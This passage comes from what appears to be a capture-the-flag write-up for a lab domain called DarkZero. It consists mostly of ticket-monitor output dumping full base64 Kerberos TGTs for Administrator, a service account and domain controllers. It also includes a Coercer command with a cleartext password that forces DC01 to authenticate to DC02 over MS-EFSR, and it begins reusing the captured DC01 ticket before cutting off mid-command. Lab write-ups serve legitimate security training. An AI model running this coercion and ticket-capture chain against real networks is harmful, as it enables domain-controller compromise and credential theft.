9XdM+KEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAYKEAAKURGA8yMDI1MTAwNjA3NDkyN1qmERgPMjAyNTEwMDYxNzQ5MjdapxEYDzIwMjUxMDEyMjIxODQ0WqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkVYVA==
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/6/2025 5:05:20 AM
EndTime : 10/6/2025 3:05:20 PM
RenewTill : 10/13/2025 5:05:20 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : svc_sql@DARKZERO.EXT
StartTime : 10/6/2025 1:05:16 AM
EndTime : 10/6/2025 11:05:16 AM
RenewTill : 10/12/2025 3:20:16 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBCjAtuhoXqsS9Y3hzEBn4lJSM7DBJwyseEo9rMYL5gjpq4BZzdHn++eGtpAZ0HRvBrcTcDmmZiT9qRC4zRvvy+rCw3el00ZVQtAs5Q+hagJA6VYt05BjhENm31M4XpYFyDdKyXSJ1OFUKzuogAJqNmdZTp5Mlfg/cW0xrDuBtfaICDTszisRPrWPnJSWJNwC+rW+64MFwTVHXBjJwLMXEK9YlZvkF9AXWwAuAsjprV99DLjxcicPwV4zGAuuKWhNzRIbYZx441wBhZlS4LCngUlLXnZ9ligoTEo5EXqsSRfPLYHibqHL1DZCKQmfsUyISTu1FdbxiIjDU9T3vb2Gtrkz2knKGudWZXQZHWIUnZEAqXF8X4yMAKpT/a+Hx0QwDJ+GNqxzRgJ10jVx+h2A8UHKiBdsbirpqQUt9ovHzYizSO59ekSGqoX34u0h8Ey58a6fs4fjlHA9eAOuKEwApANzyU9vgGTPJzHVDPJTK9FxMIWl/4Lof+x4l/s+n37AI6u1EmvDduHarbieJFWfMPpoaCtxTuMYdNhJNL+eYFz7a74q0CR9hkGfntIBLUvJ2tFSjaSq1KvSeohsJI1EcgFRdp0XCyCvnO57EcVQYEzzvNI4GGiNJIZ87CXiHOIOxo/+bH/Drnu3b5Z6y+uSIAeV8ezd7X+2elncSsewmrs2qSEh9VnPF6oTPNs9wmPfR5UZEuMnImv3btP6InuJzSa1bABNMcNAg+Oa8plmKa2HD+qmLeYmfvSVdhSQkpapGfzix04DtqYhBBmpYSJpZ7jS96aK3hBJ5xI2S35Ewb8hT53uaObvWJLp55ZG8jxztAdC0rQ9P7dYto+zCTaW8T/3hZ4CQoo582hHhvieDv4JWRUMh98NTDRuP7g/JHDIg4lTtPhDUJ/vKuoaf024nChQu0F/yyLyFKik55z6InI9v3msamaEC1v161glqsp7HYHl8U2kgPDs0JlW4yy10CoTksxBpanW98+WV2o2RQ/B7IcaWiPL4AAk+ftREvmK620vmw66VA3kgCVtxldHRGwAI3xyHcQth81IcWApqeGs8211I2Lv4jtgICMaI2pJu6ptQdHXgC0+VVHJBtRlZAb6EeNLGG/eZsUcAkp3NUWC99csRy48qat/96JtIA/inmFdLUWIoSOHI+txv6CQ33kTrHlU9YBfK3PzVahJnX7522ZCIgjpc5XNlI5/JybXorr5jRBcmdweftiaNPkOyIntgbo59yFu2gFhH3xHrJHjB0+CzW2MRWRKJftDTEScLrVWqxzgdHUgpLpAa2BSTLqNqd7MFrYA1zm9AHvEBXthMmTGOXex8wiBq7s0YOUnVfmIogvzr7t1H0NjDfrLQyUhB7tYT4vjrimbYdHfyG3ysTReG0GbfXURjc4bNEJfAmanvy+R1hK+w6OB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIGzgGQkAaGj8MJ9dKMzQ9LJNfHLTOYK1aKGxJWaVvHlBoQ4bDERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNTEwMDYwODA1MTZaphEYDzIwMjUxMDA2MTgwNTE2WqcRGA8yMDI1MTAxMjIyMjAxNlqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ=
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/6/2025 2:03:12 AM
EndTime : 10/6/2025 12:03:12 PM
RenewTill : 10/12/2025 4:18:13 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD7wNf12x4eKuLTmJowGnhAEK4vgGFVZZvusGTYQc2AcK1kMYKMUJpa84+mfzKwlCU6yy6Hw7xOjtMnOPK+dqxUmjDUTTyXoXALvXAmTAfYaPNJzXMQJdTo9ON11VORLbBQRSkas/VL1Ulc97suuF5DD7EIB06hptgYmWNbS6HxDopxCGJyVtW9PRoBsx6Zva4xcqMzTzWKni0wD9ujAi/c8BQy0fBsP2gSRv5vnNKu24Ne4t8wM6D+kJ9plHk3yQj6OMZFBdQmE7t2qUkE8h7q6HK+nNgNf0af13J7zT6ul6lGJj0rlwz+WMce28hXGwkrwWNbtv77LLu+7dnXinlOrul8ExOaUCicKZmSwsEGf1viY7k0dz5dcqReMhGjmUMRciuiN7ASK7LaUR0XR2cAHJuLxUo54vO1Q47SrmorJ/pHg7Ko+P8CvJS4JYB7qh4+rjL2ugeNYW291MUQjo6xN/4qCHDeYcBAivq9561a7YPaoJNY6biYZdiMwyp+sHGKIjV8x95Vu48w6hiT7FPzsJX+IXtbl5WBKpWZiYdF7tgFgl4aRT9vDYs4RF22v6WSmBkhMyxW47lBXV5WoLkmDu9DuWlSq7N/fr0AXqW1TLsZepbQOjMLPe8FvDqe5fEIJpSYLrtxoZtnEgwO0nUro3dYMEsz4hcD7jOlS47+WUx7Xq3jDIBq7REiuuaiVQGtsoEYlo96EYNi9DgQaVRPGo78MHLzqdXHCTrCIAhkUV/1dwUwZEvkleXVqqdxZ9IENC1tMvAYAPPMuEmjNNS9j9p5AuulhV9I6AJVqkuZ4X5nXprVx/Ez3QO9J0VjCBBE8xaJscFq3R6F7SLmANXqIAIIHSLH+vIpdrWi1iVXW5GMKJYCM3d+t5CsfVexXOgDsAcGVp83ip9a93NcLveYOeqnNkvbkqRcS9aPEmOmcqRYX396YO4ka69smBO7tt+nBHnXzafTwYBMZhpUeVRo9d0DO8N4yDGGLoUXwh8b3q0oEli3HdvS2RgaK1mUyEeO8uJNKen30iL6VZez0YhrK+ye7MAcWMMafUAQgdUmDTkitg39PYoQ7PxE5KHx9pV76eRN08mUx/2WUiSR0qN8Z9TcidkoJHdcBR/Wpwmwd4ISLn/wOmjWkuZ9T8ReiIGbYsdSW7wYEAIwDSNbLFjFhiuYmFYg7hIJAvieWCE7tIc3LlKrWm5xFEi0951N6DjnUZmVFaODw0nqNH9e2n2QXa2KJLB7tghihwwPpyeU+AzSqWBBf3cI5fHsIclE5NxATGJjHJ4JiBs3G8zcWAnoPegjgpAiFsYne67CiEeR7o3ku5VpRm1J4oPC54uOtdALUmUgzpC6iU/yuA+VXIoGQcaeOs59CyYVprcCTOLQYCkMJ2KlH0+cwlwqP2kekDG/PtPHlJGJRy/t7eBT8AM7ae1+s9XcO5RI0eggFgROjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCDtOV+juBLTAs4fexC/SH0z88ErDyjhokoUXWH7OkBQNKEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAQOEAAKURGA8yMDI1MTAwNjA5MDMxMlqmERgPMjAyNTEwMDYxOTAzMTJapxEYDzIwMjUxMDEyMjMxODEzWqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkVYVA==
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/6/2025 1:12:12 AM
EndTime : 10/6/2025 11:12:12 AM
RenewTill : 10/12/2025 3:27:13 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/6/2025 12:49:27 AM
EndTime : 10/6/2025 10:49:27 AM
RenewTill : 10/12/2025 3:18:44 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD5rZELyRfh8UlEKtcUAFQ3OqLzkA4MtckKNxxyxjnSlRpQECD7Br4H7ti7LXkx7SNIrdVQxGubfLZs3hiKCd/IYZNGLSVUvxQVYCYZqXYmccpoSQ1bEMXIzjyD+JTmkAu1Zo99BoluspN7hgrpvRCNp0afBRIwvbhnaFRo7TR+UC6VjJUEfNHMotVcsAFGZKTzDp9PYAY9a5MHwrbeI8gqvOqVKOEj1a9fZgJArdI2cozxWLYn+8mYgtKDsRwjbSOvfFT/yYbYiAC1EiLolWx4bxxknhJx5LLwo8dWR2vEGTrMzvwPAgtmYXYJe7cbmMnE1fE55hxQkvRA0s0fJJoVxomKr8Wkku0e1E4I6wtx/lATK5Xgli5Zxp8S4fvNVQ7o1iH+0L4lx4BbhkvNuC3vLh7tAFVwwVOWxaIsJLlaOs3m9aO/62OAVMk/whRLX/RDyX1QucenyFvbJGK9uL4K8StM7gm6nRNfDUQtyRH9CszGjc0WtnAJYLHgE+rER9DkKZe3kLA+mfkjR0KWsuiCsCMu0+Eo70rzKped0y/ujnHeeoR/3kIYHbdimhgmdrQi6EuC2205Bfdy8Rx27ZuSWyQHJ9Vkl3fRsPWU1KTr3a7hnzc9gRQH7PGQscS1b0GN23EcY+6kJLRTXGkAaLdiO19k7MAXca7xLY5yy9kvBPGFqbmfs6vzQ6BsrOF4JMWGnEWkuP2h1M2JylRQ3TtfKHYCVjWd+ibFASuDVr13rDhDOPtmFi/Lp9aBCu4QqC1EzcC0qaDtWdeHxxgk/ikQnHaEJ9MO6OT2Vj7rVVR020+TaqTqFelqrUPTwOq2zUNTX0wc8Za+CI92IaXWtXDZOjWAzavX9e9PCx2ZqJdmFx5xT3fAH3tz2awfNz1FfbMpeD72fc7wML1dyAH+xFMshj7GMQCTIg7DIOZ8J5Y/jlRd207ulcHSdIjxjyVwGpRqPScS5DX7xYrT7ePwilxRd/mkRHJQCMJvtsKqTyJjQCv7ihIbhEJP5+n90f8OqeAaX1keIJSC4sistb1dxYpAcmGBslbqccFv3zzuJ9wcelNhVE2gN3nh/eRqRiVBnZj0QCY5C0OI8plwsPFzTnvpHQZ0pjmFFdsjqbvkt7mLtZv5UHMv969M6W+8+arn1b5BNwf8kp5u6reoWbxrEpBe8xcbC82z7KN7HgnT0xzDM4oLPimUYV61cCbFcX9rXq82WReywgWlMrrTjWrCO7hFOVeN/LOnCXhz2kX9zrHWLkslataKEc1FzPwpcXFFz5lx9XDEvSpHqjI+RE1APVd07Xci34RjUkg6a5+KP8EqGiq5Y7DdlFXVhoJdHFUFV/spie0X+Ddbhi6dzvuNR0CeFqL+lKPqcYrypVLk4v4wkUDveUqJIUdGUaWXvT13P8bsWKAHH4LK0JEn9amHQKUrLg/gHxzZXClcXYngrtfWjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCLEugSKGsT66M1lJMJhutZNA8gVif4zF5kKofHEECB2qEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAQOEAAKURGA8yMDI1MTAwNjA3NDkyN1qmERgPMjAyNTEwMDYxNzQ5MjdapxEYDzIwMjUxMDEyMjIxODQ0WqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkVYVA==
[*] Ticket cache size: 6
After running, we can see we got TGT just from DC02
so now we will trigger authentication from DC01
.
→ There is alot of way to do this, for our case, we have Coercer already on our machine we gonna use this one.
We can use
Printer Bug (MS-RPRN)
orPetitPotam
to trigger authentication also.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ coercer coerce -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -l DC02.darkzero.ext -t 10.129.121.112
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4.3
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target 10.129.121.112
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49669,49670,49895,49926,64080,49875,49975
[+] SMB named pipe '\PIPE\efsrpc' is accessible!
[+] Successful bind to interface (df1941c5-fe89-4e79-bf10-463657acf44d, 1.0)!
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\DC02.darkzero.ext\m8BiSEJs\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? C
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\DC02.darkzero.ext\3cqBeKdn\\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? S
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\DC02.darkzero.ext\bzxIPYzh\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? S
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDecryptFileSrv(FileName='\\DC02.darkzero.ext\5rMSr2Lw\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? S
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDuplicateEncryptionInfoFile(SrcFileName='\\DC02.darkzero.ext\ut7pC8hU\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? C
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcDuplicateEncryptionInfoFile(SrcFileName='\\DC02.darkzero.ext\w1w62Ncy\\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? X
[+] All done! Bye Bye!
Back to the monitor.
1
2
3
4
5
6
7
8
9
10
11
12
[*] 10/6/2025 12:19:07 PM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/6/2025 12:48:47 AM
EndTime : 10/6/2025 10:48:47 AM
RenewTill : 10/12/2025 3:18:22 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDaxQn71vjOoX7N5NALAx+JmiqmD66LHXl6mE61CmqvJ/7opoqvcME99U8SmvtCQoPfCpjVSokqsue8x3oVcHd/UUFWKN2teZlZ43GUgT2wspbhXnppO1lTyYuXGjawUbTtmOZbHxqrieYTwLF4j4I2808ZOj+9FZEYv/ALxKcv4u7NYrfv2kKjDs1cs3ujZvyY5pUm7bLxWc3K1PDLUdWdMpkhc+Pw0wIDbLwl6n0ztEkfnD44keGpB7QSIWq8Mc28Ilhp5liJp5RIam/sa2d5IExq1Pxchnng3h0isrF6WGt1+oJj+g+Ng/tMEDl8Vc7JE4qaESnkWp7zfg9Gd3bAy8Xfd4KGOyeWgXxXcsOtGqUYKduPmjP3uaNVgclW3F4hQtzDZgt6PlvADPVfnL1K/EdEDZQo37RBTNUzGzF/pHchS+hSOWwpiXZ7EVVl8xOfP22gMXOsula69x2pcpR0MCtvquIT7qrVAKAmHwfRU4HGa0Qz/ASxZI8mJEipZ0eHSnTYzuV1SBiaQh9QBefvZXRNf13GRTAoHNxK4i8b0mU309EZ8Fhz+5rEhAytMr8b6hdTU16GkvYKr/UpSzVp6Zp6PKiEbinVZBuvtSHjIQT8lzJXyofJlaTFwvMnsEdLHjD0XI7+/qkhsUajVgvyOTHG8/gIj03zugV1JxC8x5Ww0wFTzkQs8LSErg+XQ5k9UjKgA3VGQCppy/EexbYfu4QFFMqxffw6BK+7wMN8YtGARye93IPS4/vqxsmxioVnOFRm1TidKi+nSh/z04WmtbOByuLs86eWKSi2KzSoMiDrsBkfkCPrXV0qddmi17q9JZoLXhN1GGonsz7TbszxaRYc0FSy8Ba3aUEyekCRkDXw3lZlqt2fKgbNs+qlgiiOf3xZcBduBA5/GQ2y8cVMmF9BmOlmz4AaLASikEP5l4GYsuRkCcnYbGN1tV87cQR2+Nl4OGis5T9BdScUcvc+sy3sroFdVAmxfLjFClo0Rv45/dcJzcskN0SmZeEcnHx3ezNK6PwCo6yRKcdKNYXcJr6Ja2w47c0Z2piSNkDcG3649DTIVT/3T3cVh5MenxB2hkymck7CzT4XhmC/+0Zg7Rfzki3WlKkl7g2hgH35Z+A9ZsgVtxIubD2QnaZlyOyLMUWhxVUVlWruc87yWUJyHsWyb6VXQZRbRzijXiSumzXen8oOkgltN0KCHXfEw8zZ85yrwrcHuNZG09uI3tfWG8J5SvptCXbcpPEG+WP+HXRZFHeHc7vq3nNuDPKxGiqhbOcIEEbWe2wc+PQ5pWssGu1vW1GNFJeg9Y4Y/Ffjmjw/vN2mRf0Fdg6G6aP9oVDwq1PC9/oDhzfeXsXy1qrScevE7aueOn9YE2BxCv9BaU4mUysUBLu3o/rPF7tLbGXqEO+F+EuZdVgRyVsOoozh2CW8GxQSgo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgkcYPHQ9dmapvND6uyfpdPdRVDd/ogbrfcx9lePb4mo+hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDYwNzQ4NDdaphEYDzIwMjUxMDA2MTc0ODQ3WqcRGA8yMDI1MTAxMjIyMTgyMlqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
[*] Ticket cache size: 7
There we go, capture out ticket for DC01
.
1
└─$ echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDaxQn71vjOoX7N5NALAx+JmiqmD66LHXl6mE61CmqvJ/7opoqvcME99U8SmvtCQoPfCpjVSokqsue8x3oVcHd/UUFWKN2teZlZ43GUgT2wspbhXnppO1lTyYuXGjawUbTtmOZbHxqrieYTwLF4j4I2808ZOj+9FZEYv/ALxKcv4u7NYrfv2kKjDs1cs3ujZvyY5pUm7bLxWc3K1PDLUdWdMpkhc+Pw0wIDbLwl6n0ztEkfnD44keGpB7QSIWq8Mc28Ilhp5liJp5RIam/sa2d5IExq1Pxchnng3h0isrF6WGt1+oJj+g+Ng/tMEDl8Vc7JE4qaESnkWp7zfg9Gd3bAy8Xfd4KGOyeWgXxXcsOtGqUYKduPmjP3uaNVgclW3F4hQtzDZgt6PlvADPVfnL1K/EdEDZQo37RBTNUzGzF/pHchS+hSOWwpiXZ7EVVl8xOfP22gMXOsula69x2pcpR0MCtvquIT7qrVAKAmHwfRU4HGa0Qz/ASxZI8mJEipZ0eHSnTYzuV1SBiaQh9QBefvZXRNf13GRTAoHNxK4i8b0mU309EZ8Fhz+5rEhAytMr8b6hdTU16GkvYKr/UpSzVp6Zp6PKiEbinVZBuvtSHjIQT8lzJXyofJlaTFwvMnsEdLHjD0XI7+/qkhsUajVgvyOTHG8/gIj03zugV1JxC8x5Ww0wFTzkQs8LSErg+XQ5k9UjKgA3VGQCppy/EexbYfu4QFFMqxffw6BK+7wMN8YtGARye93IPS4/vqxsmxioVnOFRm1TidKi+nSh/z04WmtbOByuLs86eWKSi2KzSoMiDrsBkfkCPrXV0qddmi17q9JZoLXhN1GGonsz7TbszxaRYc0FSy8Ba3aUEyekCRkDXw3lZlqt2fKgbNs+qlgiiOf3xZcBduBA5/GQ2y8cVMmF9BmOlmz4AaLASikEP5l4GYsuRkCcnYbGN1tV87cQR2+Nl4OGis5T9BdScUcvc+sy3sroFdVAmxfLjFClo0Rv45/dcJzcskN0SmZeEcnHx3ezNK6PwCo6yRKcdKNYXcJr6Ja2w47c0Z2piSNkDcG3649DTIVT/3T3cVh5MenxB2hkymck7CzT4XhmC/+0Zg7Rfzki3WlKkl7g2hgH35Z+A9ZsgVtxIubD2QnaZlyOyLMUWhxVUVlWruc87yWUJyHsWyb6VXQZRbRzijXiSumzXen8oOkgltN0KCHXfEw8zZ85yrwrcHuNZG09uI3tfWG8J5SvptCXbcpPEG+WP+HXRZFHeHc7vq3nNuDPKxGiqhbOcIEEbWe2wc+PQ5pWssGu1vW1GNFJeg9Y4Y/Ffjmjw/vN2mRf0Fdg6G6aP9oVDwq1PC9/oDhzfeXsXy1qrScevE7aueOn9YE2BxCv9BaU4mUysUBLu3o/rPF7tLbGXqEO+F+EuZdVgRyVsOoozh2CW8GxQSgo4HjMIHgoAMCAQCig